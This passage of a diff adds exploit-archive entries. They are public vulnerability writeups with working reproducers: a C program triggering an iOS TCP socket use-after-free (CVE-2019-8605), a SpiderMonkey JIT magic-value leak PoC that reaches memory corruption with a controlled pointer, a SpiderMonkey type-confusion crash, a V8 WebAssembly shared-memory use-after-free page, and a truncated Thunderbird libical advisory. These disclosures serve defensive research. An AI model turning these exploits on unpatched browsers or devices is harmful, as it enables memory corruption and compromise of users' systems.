+    #2 0x7f15a38733c7 in tcp_close /src/bsd/netinet/tcp_subr.c:1591:3
+    #3 0x7f15a3898159 in tcp_usr_disconnect /src/bsd/netinet/tcp_usrreq.c:743:7
+    #4 0x7f15a34323df in sodisconnectxlocked /src/bsd/kern/uipc_socket.c:1821:10
+    #5 0x7f15a34324c5 in sodisconnectx /src/bsd/kern/uipc_socket.c:1839:10
+    #6 0x7f15a34643e8 in disconnectx_nocancel /src/bsd/kern/uipc_syscalls.c:1136:10
+
+previously allocated by thread T0 here:
+    #0 0x497cbd in __interceptor_malloc _asan_rtl_:3
+    #1 0x7f15a3a28f28 in __MALLOC /src/fuzzing/zalloc.c:63:10
+    #2 0x7f15a3973cf5 in ip6_pcbopt /src/bsd/netinet6/ip6_output.c:3116:9
+    #3 0x7f15a397193b in ip6_ctloutput /src/bsd/netinet6/ip6_output.c:2637:13
+    #4 0x7f15a389e3ac in tcp_ctloutput /src/bsd/netinet/tcp_usrreq.c:1906:12
+    #5 0x7f15a3440614 in sosetoptlock /src/bsd/kern/uipc_socket.c:4808:12
+    #6 0x7f15a346e45c in setsockopt /src/bsd/kern/uipc_syscalls.c:2461:10
+
+
+#include <stdio.h>
+#include <unistd.h>
+#include <netinet/in.h>
+
+/*
+TCP-based reproducer for CVE-2019-8605
+This has the benefit of being reachable from the app sandbox on iOS 12.2.
+*/
+
+#define IPV6_3542PKTINFO 46
+
+int main() {
+    int s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
+    printf("res0: %d\n", s);
+
+    unsigned char buffer[1] = {'\xaa'};
+    int res = setsockopt(s, IPPROTO_IPV6, IPV6_3542PKTINFO, buffer, sizeof(buffer));
+    printf("res1: %d\n", res);
+
+    res = disconnectx(s, 0, 0);
+    printf("res2: %d\n", res);
+
+    socklen_t buffer_len = sizeof(buffer);
+    res = getsockopt(s, IPPROTO_IPV6, IPV6_3542PKTINFO, buffer, &buffer_len);
+    printf("res3: %d\n", res);
+    printf("got %d\n", buffer[0]);
+
+    close(s);
+    printf("done\n");
+}
+
+
+It seems that this TCP testcase I've posted works nicely for UaF reads, but getting a write isn't straightforward because calling disconnectx explicitly makes subsequent setsockopt and connect/bind/accept/etc. calls fail because the socket is marked as disconnected.
+
+But there is still hope. PR_CONNREQUIRED is marked for TCP6, which means we may be able to connect twice (forcing a disconnect during the second connection) using the same TCP6 socket and have a similar situation to the original crash.
\ No newline at end of file
diff --git a/exploits/multiple/dos/46939.txt b/exploits/multiple/dos/46939.txt
new file mode 100644
index 000000000..fda879ea0
--- /dev/null
+++ b/exploits/multiple/dos/46939.txt
@@ -0,0 +1,373 @@
+IonMonkey can, during a bailout, leak an internal JS_OPTIMIZED_OUT magic value to the running script. This magic value can then be used to achieve memory corruption.
+
+# Prerequisites
+
+## Magic Values
+
+Spidermonkey represents JavaScript values with the C++ type JS::Value [1], which is a NaN-boxed value that can encode a variety of different types [2] such as doubles, string pointers, integers, or object pointers. Besides the types available in JavaScript, JS::Value can also store special ("magic") [3] values for various internal purposes. For example, JS_ELEMENTS_HOLE is used to represent holes in arrays, and JS_OPTIMIZED_ARGUMENTS represents the `arguments` object during a function call (so that no actual memory allocation is required for it).
+
+## Branch Pruning
+
+IonMonkey (Spidermonkey's JIT engine) represents JavaScript code as a control-flow graph (CFG) of MIR (mid-level IR) instructions. When starting to compile a function, IonMonkey first translates the bytecode to the MIR, keeping the same CFG. Afterwards, it tries to remove subtrees in the CFG that appear to not be used in order to save compilation time and potentially improve various optimizations. As an example, consider the following code, and assume further that in all previous executions only the if branch had been taken:
+
+    if (cond_that_has_always_been_true) {
+        // do something
+    } else {
+        // do something else
+    }
+
+In this case, branch pruning would likely decide to discard the else branch entirely and instead replace it with a bailout instruction to bailout to the baseline JIT should the branch ever be taken:
+
+    if (cond_that_has_always_been_true) {
+        // do something
+    } else {
+        bailout();      // will continue execution in baseline JIT
+    }
+
+## Phi Elimination
+
+IonMonkey uses static single assignment (SSA) form for its intermediate representation of the code (MIR). In SSA form, every variable is assigned exactly once. Reassignments of variables on different branches in the CFG are handled with special Phi instructions. Consider the following example:
+
+    var x;
+    if (c) {
+        x = 1337;
+    } else {
+        x = 1338;
+    }
+    print(x);
+
+After translation to SSA form it would look something like this:
+
+    if (c) {
+        x1 = 1337;
+    } else {
+        x2 = 1338;
+    }
+    x3 = Phi(x1, x2);
+    print(x3);
+
+Phi Elimination is an optimization pass that tries to remove Phi instructions that are either redundant or unobservable (which frequently appear as result of SSA conversion and various optimizations). Quoting from the source code [4]:
+
+    // Eliminates redundant or unobservable phis from the graph.  A
+    // redundant phi is something like b = phi(a, a) or b = phi(a, b),
+    // both of which can be replaced with a.  An unobservable phi is
+    // one that whose value is never used in the program.
+
+Unobservable Phis are then replaced a special value, MagicOptimizedOut [5]. In case of a bailout from the JIT, such an optimized-out value will be materialized as a JS_OPTIMIZED_OUT [6] JS magic value. This should not be observable by script since the compiler was able to prove that the variable is never used. Spidermonkey can, however, not simply leave the slot for an optimized-out variable uninitialized as e.g. the garbage collector expects a valid JS::Value in it.
+
+Phi elimination can lead to problems in combination with branch pruning. Consider the following example:
+
+    var only_used_in_else_branch = ...;
+    if (cond_that_has_always_been_true) {
+        // do something, but don't use only_used_in_else_branch
+    } else {
+        // do something else and use only_used_in_else_branch
+    }
+
+Here again, branch pruning might decide to remove the else branch, in which case no use of the variable remains. As such, it would be replaced by a magic JS constant (JS_OPTIMIZED_OUT) in the JIT. Later, if the else branch was actually taken, the JIT code would perform a bailout and try to restore the variable. However, as it has been removed, it would now (incorrectly) restore it as JS_OPTIMIZED_OUT magic and continue using it in the baseline JIT, where it could potentially be observed by the executing script. To avoid this, branch pruning marks SSA variables that are used in removed blocks as "useRemoved" [7], in which case the variables will not be optimized out [8].
+
+# Bug description
+
+While fuzzing Spidermonkey, I encountered the following sample which crashes Spidermonkey built from the current release branch:
+
+	function poc() {
+		const x = "asdf";
+		for (let v7 = 0; v7 < 2; v7++) {
+			function v8() {
+				let v13 = 0;
+				do {
+					v13++;
+				} while (v13 < 1200000);
+			}
+			const v15 = v8();
+			for (let v25 = 0; v25 < 100000; v25++) {
+				if (x) {
+				} else {
+					const v26 = {get:v8};
+					for (let v30 = 0; v30 < 1000; v30++) { }
+				}
+			}
+		}
+	}
+	poc();
+
+It appears what is happening here is roughly the following:
+
+At the beginning of JIT compilation (somewhere in one of the inner loops), IonMonkey produces the following simplified CFG (annotated with the different SSA variables for x):
+
+          +-------+
+          |   0   +-----+
+          | Entry |     |
+          +-------+     |
+      x1 = "asdf"       v
+                    +-----------+
+                    |     1     |
+   +--------------->| Loop Head |
+   |                +--+--------+
+   |                   |  x2 = Phi(x1, x5)
+   |                   +--------+
+   |                            v
+   |   +-----------+     +------------+
+   |   |     3     |     |    2...    |
+   |   | OSR Entry |     | Inlined v8 |
+   |   +-+---------+     +----------+-+
+   |     | x3 = osrval('x')         |
+   |     +---------+     +----------+
+   |               v     v
+   |           +-------------+
+   |           |      4      |
+   |           |    Merge    |
+   |           +-----------+-+
+   |      x4 = Phi(x3, x2) |
+   |                       v
+   |           +-------------+
+   |           |    5...     |
+   +-----------+ Inner Loop  |
+               +-------------+
+             x5 = Phi(x4, ..); use(x5);
+
+Since the function is already executing in the baseline JIT, the JIT code compiled by IonMonkey will likely be entered via OSR at block 3 in the middle of the outer loop.
+Next, branch pruning runs. It inspects the hit count of the bytecode (and performs some more heuristics), and decides that block 2 (or really the exit from the loop in v8) should be pruned and replaced with a bailout to the baseline JIT. The CFG then looks something like this:
+
+          +-------+
+          |   0   +-----+
+          | Entry |     |
+          +-------+     |
+      x1 = "asdf"       v
+                    +-----------+
+                    |     1     |
+   +--------------->| Loop Head |
+   |                +--+--------+
+   |                   |  x2 = Phi(x1, x5)
+   |                   +--------+
+   |                            v
+   |   +-----------+     +------------+
+   |   |     3     |     |    2...    |
+   |   | OSR Entry |     | Inlined v8 |
+   |   +-+---------+     +------------+
+   |     | x3 = osrval(1)
+   |     +---------+        !! branch pruned !!
+   |               v
+   |           +-------------+
+   |           |      4      |
+   |           |    Merge    |
+   |           +-----------+-+
+   |      x4 = Phi(x3)     |
+   |                       v
+   |           +-------------+
+   |           |    5...     |
+   +-----------+ Inner Loop  |
+               +-------------+
+             x5 = Phi(x4, ..); use(x5);
+
+Since there was no use of x2 in the removed code, x2 is not marked as "use removed". However, when removing the branch 2 -> 4, IonMonkey removed x2 as input to the Phi for x4. This seems logical since x2 can now definitely not flow into x4 since there is no longer a path between block 1 and block 4. However, this removal of a use without setting the "use removed" flag leads to problems later on, in particular during Phi Elimination, which changes the code to the following:
+
+          +-------+
+          |   0   +-----+
+          | Entry |     |
+          +-------+     |
+      x1 = "asdf"       v
+                    +-----------+
+                    |     1     |
+   +--------------->| Loop Head |
+   |                +--+--------+
+   |                   |  x2 = OPTIMIZED_OUT
+   |                   +--------+
+   |                            v
+   |   +-----------+     +------------+
+   |   |     3     |     |    2...    |
+   |   | OSR Entry |     | Inlined v8 |
+   |   +-+---------+     +------------+
+   |     | x3 = osrval(1)
+   |     +---------+        !! branch pruned !!
+   |               v
+   |           +-------------+
+   |           |      4      |
+   |           |    Merge    |
+   |           +-----------+-+
+   |      x4 = Phi(x3)     |
+   |                       v
+   |           +-------------+
+   |           |    5...     |
+   +-----------+ Inner Loop  |
+               +-------------+
+             x5 = Phi(x4, ..); use(x5);
+
+Here, Phi Elimination decided that x2 is an unobservable Phi as it is not used anywhere. As such, it replaces it with a MagicOptimizedOut value. However, when block 2 is executed in the JITed code, it will perform a bailout and restore x as JS_OPTIMIZED_OUT magic value. This is incorrect as the interpreter/baseline JIT will use x once it reaches the inner loop. There, x (now the optimized out magic) is used for a ToBoolean conversion, which crashes (in a non exploitable way) when reaching this code:
+
+    JS_PUBLIC_API bool js::ToBooleanSlow(HandleValue v) {
+      ...;
+      MOZ_ASSERT(v.isObject());
+      return !EmulatesUndefined(&v.toObject());     // toObject will return an invalid pointer for a magic value
+    }
+
+
+A similar scenario is described in FlagPhiInputsAsHavingRemovedUses [9], which is apparently supposed to prevent this from happening by marking x2 as useRemoved during branch pruning. However, in this case, FlagPhiInputsAsHavingRemovedUses fails to mark x2 as useRemoved as it concludes that x4 is also unused: basically, FlagPhiInputsAsHavingRemovedUses invokes DepthFirstSearchUse [10] to figure out whether some Phi is used by performing a depth-first search over all uses. If it finds a non-Phi use, it returns true. In block 5 above (which are really multiple blocks), x4 is used by another Phi, x5, which is then used by a "real" instruction. DepthFirstSearchUse now visits x5 and puts it into the worklist. It then eventually finds x4 and:
+
+* finds x5 as use, but as x5 is already in the worklist it skips it [11]
+* finds no other uses, and thus (incorrectly?) marks x4 as unused [12]
+
+As such, x2 is later on not marked as useRemove since its only use (x4) appears to be unused anyways.
+
+# Exploitation
+
+It is possible get a reference to the magic JS_OPTIMIZED_OUT value by changing the body of the inner for loop to something like this:
+
+        for (let v25 = 0; v25 < 100000; v25++) {
+            // Should never be taken, but will be after triggering the bug (because both v3 and v1
+            // will be a JS_OPTIMIZED_OUT magic value).
+            if (v3 === v1) {
+                let magic = v3;
+                console.log("Magic is happening!");
+                // do something with magic
+                return;
+            }
+            if (v1) {
+            } else {
+                const v26 = {get:v8};
+                for (let v30 = 0; v30 < 1000; v30++) { }
+            }
+        }
+
+Afterwards, the magic value will be stored in a local variable and can be freely used. What remains now is a way to use the magic value to cause further misbehaviour in the engine.
+
+Spidermonkey uses different JSMagic values in various places. These places commonly check for the existence of some specific magic value by calling `.isMagic(expectedMagicType)` on the value in question. For example, to check for the magic hole element, the code would invoke `elem.isMagic(JS_ELEMENTS_HOLE)`. The implementation of `isMagic` is shown below:
+
+  bool isMagic(JSWhyMagic why) const {
+    MOZ_ASSERT_IF(isMagic(), s_.payload_.why_ == why);
+    return isMagic();
+  }
+
+Interestingly, this way of implementing it makes it possible to supply a different magic value than the expected one while still causing this function to return true, thus making the caller believe that it has the right magic value. As such, the JS_OPTIMIZED_OUT magic value can, in many cases, be used as any other magic value in the code.
+
+One interesting use of magic values is JS_OPTIMIZED_ARGUMENTS, representing the `arguments` object. The idea is that e.g.
+
+    function foo() {
+        print(arguments[0]);
+    }
+
+Gets compiled to bytecode such as:
+
+    push JS_OPTIMIZED_ARGUMENTS
+    LoadElem 0
+    call print
+
+The special handling for the magic value is then performed here:
+
+    static bool DoGetElemFallback(JSContext* cx, BaselineFrame* frame,
+                                  ICGetElem_Fallback* stub, HandleValue lhs,
+                                  HandleValue rhs, MutableHandleValue res) {
+      // ...
+
+      bool isOptimizedArgs = false;
+      if (lhs.isMagic(JS_OPTIMIZED_ARGUMENTS)) {
+        // Handle optimized arguments[i] access.
+        if (!GetElemOptimizedArguments(cx, frame, &lhsCopy, rhs, res,
+                                       &isOptimizedArgs)) {
+          return false;
+        }
+
+      // ...
+
+Which eventually ends up in:
+
+    inline Value& InterpreterFrame::unaliasedActual(
+      unsigned i, MaybeCheckAliasing checkAliasing) {
+        MOZ_ASSERT(i < numActualArgs());
+        MOZ_ASSERT_IF(checkAliasing, !script()->argsObjAliasesFormals());
+        MOZ_ASSERT_IF(checkAliasing && i < numFormalArgs(),
+                      !script()->formalIsAliased(i));
+        return argv()[i];         // really is just argv_[i];
+    }
+
+An InterpreterFrame [13] is an object representing the invocation context of a JavaScript function.
+Basically, there are two types of InterpreterFrames: CallFrames [14], which are used for regular function calls and thus has nactul_ (the number of arguments) and argv_ (a pointer to the argument values) initialized, and ExecuteFrame [15], which are e.g. used for eval()ed code. Interestingly, ExecuteFrames leave nactual_ and argv_ uninitialized, which is normally fine as code would never access these fields in an ExecuteFrame. However, by having a reference to a magic value, it now becomes possible to trick the engine into believing that whatever frame is currently active is a CallFrame and thus has a valid argv_ pointer by loading an element from the magic value (`magic[i]` in JS). Conveniently, InterpreterFrames are allocated by a bump allocator, used solely for the interpreter stack. As such, the allocations are very deterministic and it is easily possible to overlap the uninitialized member with any other data that is stored on the interpreter stack, such as local variables of functions.
+
+The following PoC (tested against a local Spidermonkey build and Firefox 65.0.1) demonstrates this. It will first trigger the bug to leak the magic JS_OPTIMIZED_OUT value. Afterwards, it puts a controlled value (0x414141414141 in binary) on the interpreter stack (in fill_stack), then uses the magic value from inside an eval frame of which the argv_ pointer overlaps with the controlled value. Spidermonkey will then assume that the current frame must be a FunctionFrame and treat the value as an argv_ pointer, thus crashing at 0x414141414141.
+
+    // This function uses roughly sizeof(InterpreterFrame) + 14 * 8 bytes of interpreter stack memory.
+    function fill_stack() {
+        // Use lot's of stack slots to increase the allocation size of this InterpreterFrame.
+        var v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13;
+        // Will overlap with the argv_ pointer in the InterpreterFrame for the call to eval.
+        var v14 = 3.54484805889626e-310;
+    }
+
+    // This function uses roughly sizeof(InterpreterFrame) bytes of interpreter stack memory. The inner
+    // call to eval will get its own InterpreterFrame, which leaves the argv_ pointer uninitialized
+    // (since it's an eval frame). However, due to having a magic value here, it is possible to trick
+    // the interpreter into accessing argv_ (because it assumes that the magic value represents an
+    // `arguments` object). The argv_ pointer of the inner frame will then overlap with one of the
+    // variables of the previous function, and is thus fully controllable.
+    function trigger(magic) {
+        eval(`magic[0]`);
+    }
+
+    // Invoke the two functions above to achieve memory corruption given a magic JS::Value.
+    function hax(magic) {
+        fill_stack();
+        trigger(magic);
+    }
+
+    function pwn() {
+        const v1 = "adsf";
+        const v3 = "not_asdf";
+        for (let v7 = 0; v7 < 2; v7++) {
+            function v8() {
+                let v13 = 0;
+                do {
+                    v13++;
+                } while (v13 < 1200000);
+                // If the previous loop runs long enough, IonMonkey will JIT compile v8 and enter the
+                // JITed code via OSR. This will leave the hitCount for the loop exit in the interpreter
+                // at 0 (because the exit is taken in JITed code). This in turn will lead to IonMonkey
+                // pruning the loop exit when compiling pwn() (with inlined v8), as its heuristics
+                // suggest that the branch is never taken (hitCount == 0 and a few more). This will then
+                // lead to the incorrect removal of Phi nodes, and ultimately the leaking of a
+                // JS_OPTMIZED_OUT magic value to the baseline JIT, where it is observable for the
+                // current script.
+            }
+            const v15 = v8();
+            for (let v25 = 0; v25 < 100000; v25++) {
+                // Should never be taken, but will be after triggering the bug (because both v3 and v1
+                // will be a JS_OPTIMIZED_OUT magic value).
+                if (v3 === v1) {
+                    let magic = v3;
+                    console.log("Magic is happening!");
+                    hax(magic);
+                    return;
+                }
+                if (v1) {
+                } else {
+                    const v26 = {get:v8};
+                    for (let v30 = 0; v30 < 1000; v30++) { }
+                }
+            }
+        }
+    }
+    pwn();
+
+[1]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/public/Value.h#L276
+[2]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/public/Value.h#L53
+[3]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/public/Value.h#L191
+[4]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L1382
+[5]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonTypes.h#L447
+[6]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/public/Value.h#L223
+[7]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/MIR.h#L129
+[8]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L1330
+[9]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L146
+[10]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L41
+[11]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L106
+[12]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L135
+[13]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/vm/Stack.h#L85
+[14]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/vm/Stack-inl.h#L51
+[15]  https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/vm/Stack.cpp#L35
+
+
+Fixed in  https://www.mozilla.org/en-US/security/advisories/mfsa2019-08/#CVE-2019-9792
+
+The issue was fixed in two ways:
+
+1. In  https://hg.mozilla.org/releases/mozilla-beta/rev/5f4ba71d48892ddfc9e800aec521a46eaae175fd the debug assertion in isMagic was changed into a release assert, preventing the exploitation of leaked JS_MAGIC values as described above.
+
+2. In  https://hg.mozilla.org/mozilla-central/rev/044a64c70a3b the DFS in DepthFirstSearchUse was modified to (conservatively) mark Phis in loops as used. A more complex implementation which can correctly determine whether Phis inside loops are actually used remains as a separate bug.
\ No newline at end of file
diff --git a/exploits/multiple/dos/46940.txt b/exploits/multiple/dos/46940.txt
new file mode 100644
index 000000000..888f0f458
--- /dev/null
+++ b/exploits/multiple/dos/46940.txt
@@ -0,0 +1,80 @@
+While fuzzing Spidermonkey, I encountered the following (commented and modified) JavaScript program which crashes debug builds of the latest release version of Spidermonkey (from commit  https://github.com/mozilla/gecko-dev/commit/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c):
+
+    function O1() {
+        this.s = 'foobar';
+        this.a = 42;
+
+        // Avoid unboxed layout for O1 instances as this will cause the JIT
+        // compiler to behave differently and not emit the ObjectGroupDispatch
+        // operation (see below).
+        delete this.a;
+    }
+
+    // This function will be inlined below in v4, together with the default
+    // Object.prototype.toString implementation.
+    // This just demonstrates that a custom function can be inlined which
+    // will make assumptions about the input ObjectGroup.
+    O1.prototype.toString = function() {
+        return this.s;
+    };
+
+    function v4(v5) {
+        // Once v22 is allocated as unboxed object, this will convert it to a
+        // native object, which will cause its ObjectGroup to change.
+        delete v5.nonExistent;
+
+        // The call to .toString here will be implemented as a switch
+        // (ObjectGroupDispatch operation) on the ObjectGroup with two cases
+        // (ObjectGroup of v22 and v17). Depending on the input, the dispatch will
+        // jump to one of the two inlined implementations of toString. However,
+        // after v22 is allocated as UnboxedObject (still with the same
+        // ObjectGroup as before), the delete operation above will convert it back
+        // to a NativeObject, now changing the ObjectGroup. Afterwards, this
+        // ObjectGroupDispatch operation will see an unexpected ObjectGroup and,
+        // in debug builds, crash with an assertion failure. In release builds
+        // it will just fallthrough to whichever branch was emitted right after
+        // the dispatch operation.
+        return v5.toString();
+    }
+
+    function v11() {
+        const v22 = {p: 1337};
+        v4(v22);
+
+        let v26 = 0;
+        do {
+            const v17 = new O1;
+            v4(v17);
+            v26++;
+        } while (v26 < 100);
+    }
+    for (let v33 = 0; v33 < 100; v33++) {
+        const v37 = v11();
+    }
+
+The program will crash with an assertion similar to:
+
+    > ../build_DBG.OBJ/dist/bin/js crash.js
+    Assertion failure: Unexpected ObjectGroup, at js/src/jit/MacroAssembler.cpp:2014
+    [1]    54116 trace trap  ../build_DBG.OBJ/dist/bin/js crash.js
+
+It appears that roughly the following is happening here:
+
+* Initially, the objects v22 and v17 will be allocated as native objects with two different ObjectGroups (an ObjectGroup [1] stores type information such as the prototype object and property/method types for an object): OG1 and OG2.
+* Function v4 will be called repeatedly with objects of both ObjectGroups and will eventually be JIT compiled by IonMonkey. At that point, it will be compiled to expect an object with ObjectGroup OG1 or OG2 based on type feedback from the interpreter/baseline JIT and will be deoptimized if it is ever called with an object of a different group.
+* The call to .toString in v4 will be optimized by inlining [2] the two possible implementations (O1.prototype.toString and Object.prototype.toString) and then performing a switch on the ObjectGroup of the input to determine which implementation to jump to. The switch is implemented by the ObjectGroupDispatch operation. Since both input ObjectGroups are covered, the instruction does not have a default (fallback) path [3].
+* At a later point, the allocation site of v22 is modified to create an object with unboxed layout [4] which will store its properties inline in an unboxed form but still use ObjectGroup OG1.
+* Afterwards, in the JIT code for v4, the delete operation converts the UnboxedObject back to a NativeObject [5], this time changing the ObjectGroup to a new group OG3 [6].
+* Finally, when executing the machine code for the ObjectGroupDispatch operation, the new ObjectGroup matches none of the expected ones. At this point the program will crash with an assertion in debug builds. In release builds, it would now simply fall through to whichever one of the inlined implementations was directly following the ObjectGroupDispatch operation.
+
+At least this way of triggering the bug is related to UnboxedObjects, which have recently been disabled by default:  https://github.com/mozilla/gecko-dev/commit/26965039e60a00b3600ce2e6a559106e4a3a30ca However, I am not sure if the conversion from unboxed to native objects due to the property deletion is the only reason that an object's ObjectGroup can change unexpectedly (in this situation).
+
+As for exploitation, it might be possible to cause a type confusion by causing a fallthrough to the inlined code for the other ObjectGroup. In that case, the inlined code would expect to receive an object of a specific ObjectGroup and might omit further security checks based on that. For this specific sample it seems that the fallthrough path always happens to be the correct one (i.e. the one for Object.prototype.toString), but I assume it could also be the other way around in a different context. Furthermore, it might be possible to cause other code constructs (apart form the ObjectGroupDispatch) that rely on ObjectGroup information to misbehave in this situation. 
+
+
+[1]  https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/ObjectGroup.h#L87
+[2]  https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonBuilder.cpp#L4517
+[3]  https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonBuilder.cpp#L4923
+[4]  https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.cpp#L1416
+[5]  https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.cpp#L1150
+[6]  https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.cpp#L756
\ No newline at end of file
diff --git a/exploits/multiple/dos/46968.html b/exploits/multiple/dos/46968.html
new file mode 100644
index 000000000..b906b3389
--- /dev/null
+++ b/exploits/multiple/dos/46968.html
@@ -0,0 +1,75 @@
+<!--
+VULNERABILITY DETAILS
+https://cs.chromium.org/chromium/src/v8/src/wasm/wasm-objects.cc?rcl=783343158eb1b147df7e6669f1d03c690c878e21&l=1253
+```
+int32_t WasmMemoryObject::Grow(Isolate* isolate,
+                               Handle<WasmMemoryObject> memory_object,
+                               uint32_t pages) {
+[...]
+  Handle<JSArrayBuffer> new_buffer;
+  if (old_buffer->is_shared()) {
+    // Adjust protections for the buffer.
+    if (!AdjustBufferPermissions(isolate, old_buffer, new_size)) {
+      return -1;
+    }
+    void* backing_store = old_buffer->backing_store();
+    if (memory_tracker->IsWasmSharedMemory(backing_store)) {
+      // This memory is shared between different isolates.
+      DCHECK(old_buffer->is_shared());
+      // Update pending grow state, and trigger a grow interrupt on all the
+      // isolates that share this buffer.
+      memory_tracker->SetPendingUpdateOnGrow(old_buffer, new_size);
+      // Handle interrupts for this isolate so that the instances with this
+      // isolate are updated.
+      isolate->stack_guard()->HandleInterrupts();
+      // Failure to allocate, or adjust pemissions already handled here, and
+      // updates to instances handled in the interrupt handler safe to return.
+      return static_cast<uint32_t>(old_size / wasm::kWasmPageSize);
+    }
+    // SharedArrayBuffer, but not shared across isolates. Setup a new buffer
+    // with updated permissions and update the instances.
+    new_buffer =
+        wasm::SetupArrayBuffer(isolate, backing_store, new_size, // ***1***
+                               old_buffer->is_external(), SharedFlag::kShared);
+    memory_object->update_instances(isolate, new_buffer);
+[...]
+```
+
+When `Grow` is called on a `WebAssembly.Memory` object that's backed by a `SharedArrayBuffer`, it
+uses the buffer's backing store pointer to construct a new array buffer[1]. Calling `Detach` on
+shared buffers is prohibited by the spec, so the the method just leaves the old one as it is. Thus
+two array buffers might end up owning the same backing store, and if one of the them got garbage
+collected, the other one would point to a freed memory region.
+
+Blink's SharedArrayBuffer implementation uses reference-counted backing stores, so v8 should
+probably implement something similar.
+
+VERSION
+Google Chrome 73.0.3683.103 (Official Build) (64-bit) (cohort: Stable)
+Chromium 75.0.3758.0 (Developer Build) (64-bit)
+This bug affects the stable branch due to the currently active "WebAssembly Threads" Origin Trial.
+https://developers.chrome.com/origintrials/#/view_trial/-5026017184145473535
+
+REPRODUCTION CASE
+-->
+
+<script>
+function gc() {
+  for (let i = 0; i < 50; ++i) {
+    let buffer = new ArrayBuffer(1024 * 1024);
+  }
+}
+
+setInterval(() => {
+  memory = new WebAssembly.Memory({initial: 1, maximum: 2, shared: true});
+  memory.grow(1);
+  gc();
+  array = new Int8Array(memory.buffer);
+  array[0x1337] = 1;
+});
+</script>
+
+<!--
+CREDIT INFORMATION
+Sergei Glazunov of Google Project Zero
+-->
\ No newline at end of file
diff --git a/exploits/multiple/dos/47001.txt b/exploits/multiple/dos/47001.txt
new file mode 100644
index 000000000..5203a76c8
--- /dev/null
+++ b/exploits/multiple/dos/47001.txt
@@ -0,0 +1,107 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA256
+
+X41 D-Sec GmbH Security Advisory: X41-2019-004
+
+Type confusion in Thunderbird
+=============================
+Severity Rating: Medium
+Confirmed Affected Versions: All versions affected
+Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
+Vendor: Thunderbird
+Vendor URL: https://www.thunderbird.net/
+Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1555646
+Vector: Incoming mail with calendar attachment
+Credit: X41 D-SEC GmbH, Luis Merino
+Status: Public
+CVE: CVE-2019-11706
+CWE: 843
+CVSS Score: 6.5
+CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
+Advisory-URL:
+https://www.x41-dsec.de/lab/advisories/x41-2019-004-thunderbird
+
+Summary and Impact
+==================
+A type confusion has been identified in the Thunderbird email
+client. The issue is present in the libical implementation, which was
+forked from upstream libical version 0.47.
+The issue can be triggered remotely, when an attacker sends an specially
+crafted calendar attachment and does not require user interaction. It
+might be used by a remote attacker to crash the process or leak
+information from the client system via calendar replies.
+X41 did not perform a full test or audit on the software.
+
+Product Description
+===================
+Thunderbird is a free and open source email, newsfeed, chat, and
+calendaring client, that's easy to set up and customize.
+
+Analysis
+========
+A type confusion in icalproperty.c
+icaltimezone_get_vtimezone_properties() can be triggered while parsing a
+malformed calendar attachment. Missing sanity checks allows a TZID
+property to be parsed as ICALFLOATVALUE but it is later used as a
+string.
+The bug manifests with strdup(tzid); being called with tzid containing
+a bad pointer obtained by casting to char* from a float value, which
+typically means segfaulting by dereferencing a non-mapped memory page.
+An attacker might be able to deliver an input file containing specially
+crafted float values as TZID properties which could point to arbitrary
+memory positions.
+Certain conditions could allow to exfiltrate information via a calendar
+reply or other undetermined impact.
+
+Proof of Concept
+================
+A reproducer eml file can be found in
+
+https://github.com/x41sec/advisories/tree/master/X41-2019-004
+
+Workarounds
+===========
+A fix is available from upstream. Alternatively, libical can be replaced
+by icaljs, a JavaScript implementation of ical parsing, by setting
+calendar.icaljs = true in Thunderbird configuration.
+
+Timeline
+========
+2019-05-30 Issues reported to the vendor
+2019-06-07 Vendor reply
+2019-06-12 CVE IDs assigned
+2019-06-13 Patched Version released
+2019-06-13 Advisory released
+
+About X41 D-SEC GmbH
+====================
+X41 is an expert provider for application security services.
+Having extensive industry experience and expertise in the area of
+information security, a strong core security team of world class
